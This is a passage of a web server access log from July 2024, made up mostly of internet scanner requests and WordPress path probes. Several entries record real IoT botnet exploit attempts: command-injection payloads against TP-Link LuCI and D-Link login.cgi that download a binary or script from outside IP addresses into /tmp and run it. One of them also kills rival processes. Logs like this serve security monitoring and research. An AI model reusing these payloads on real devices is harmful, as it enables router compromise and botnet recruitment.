200 423 "-" "-" 149.50.103.48 - - [21/Jul/2024:19:33:10 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 86.129.123.135 - - [21/Jul/2024:19:40:53 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" 162.142.125.196 - - [21/Jul/2024:19:57:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.196 - - [21/Jul/2024:19:57:06 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.196 - - [21/Jul/2024:19:57:07 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.196 - - [21/Jul/2024:19:57:07 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 149.50.103.48 - - [21/Jul/2024:20:03:53 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 72.167.44.205 - - [21/Jul/2024:20:18:32 +0200] "GET /manager/html HTTP/1.1" 404 283 "-" "python-requests/2.27.1" 149.50.103.48 - - [21/Jul/2024:20:19:06 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 149.50.103.48 - - [21/Jul/2024:20:41:06 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 84.54.51.37 - - [21/Jul/2024:21:02:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 141.98.11.189 - - [21/Jul/2024:21:09:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 162.142.125.202 - - [21/Jul/2024:21:22:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.202 - - [21/Jul/2024:21:22:49 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.202 - - [21/Jul/2024:21:22:49 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.202 - - [21/Jul/2024:21:22:50 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 80.82.77.202 - - [21/Jul/2024:21:31:32 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" 207.244.254.161 - - [21/Jul/2024:21:36:37 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.28.1" 149.50.103.48 - - [21/Jul/2024:21:43:59 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 162.142.125.196 - - [21/Jul/2024:22:10:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.196 - - [21/Jul/2024:22:10:56 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.196 - - [21/Jul/2024:22:10:57 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.196 - - [21/Jul/2024:22:10:58 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 206.168.34.35 - - [21/Jul/2024:22:19:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 206.168.34.35 - - [21/Jul/2024:22:19:08 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 206.168.34.35 - - [21/Jul/2024:22:19:09 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 206.168.34.35 - - [21/Jul/2024:22:19:09 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 162.142.125.209 - - [21/Jul/2024:22:21:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.209 - - [21/Jul/2024:22:21:51 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.209 - - [21/Jul/2024:22:21:51 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.209 - - [21/Jul/2024:22:21:52 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 206.168.34.209 - - [21/Jul/2024:22:32:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 206.168.34.209 - - [21/Jul/2024:22:32:08 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 206.168.34.209 - - [21/Jul/2024:22:32:09 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 206.168.34.209 - - [21/Jul/2024:22:32:09 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 59.178.36.226 - - [21/Jul/2024:22:37:53 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 59.178.36.226 - - [21/Jul/2024:22:37:53 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 20.66.37.242 - - [21/Jul/2024:22:43:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 45.148.10.202 - - [21/Jul/2024:22:56:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 45.156.128.71 - - [21/Jul/2024:23:03:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 198.235.24.136 - - [21/Jul/2024:23:07:31 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 94.156.66.185 - - [21/Jul/2024:23:22:33 +0200] "GET /.well-known/ HTTP/1.1" 404 299 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.66.185 - - [21/Jul/2024:23:22:38 +0200] "GET /wp-content/uploads/ HTTP/1.1" 404 304 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.66.185 - - [21/Jul/2024:23:22:41 +0200] "GET /wp-includes/ HTTP/1.1" 404 299 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.66.185 - - [21/Jul/2024:23:22:44 +0200] "GET /wp-admin/ HTTP/1.1" 404 297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.66.185 - - [21/Jul/2024:23:22:50 +0200] "GET /wp-content/ HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.66.185 - - [21/Jul/2024:23:22:55 +0200] "GET /wp-content/upgrade/ HTTP/1.1" 404 304 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.156.66.185 - - [21/Jul/2024:23:23:01 +0200] "GET /.well-knownold/ HTTP/1.1" 404 301 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.8.11.202 - - [21/Jul/2024:23:27:46 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-" 141.98.11.189 - - [22/Jul/2024:00:01:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 92.249.48.202 - - [22/Jul/2024:00:20:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 185.224.128.43 - - [22/Jul/2024:00:30:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 149.50.103.48 - - [22/Jul/2024:00:43:42 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 183.111.79.82 - - [22/Jul/2024:01:00:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you" 93.174.93.12 - - [22/Jul/2024:01:26:49 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36" 149.50.103.48 - - [22/Jul/2024:01:51:07 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 45.148.10.202 - - [22/Jul/2024:01:51:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1" 45.148.10.202 - - [22/Jul/2024:01:51:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"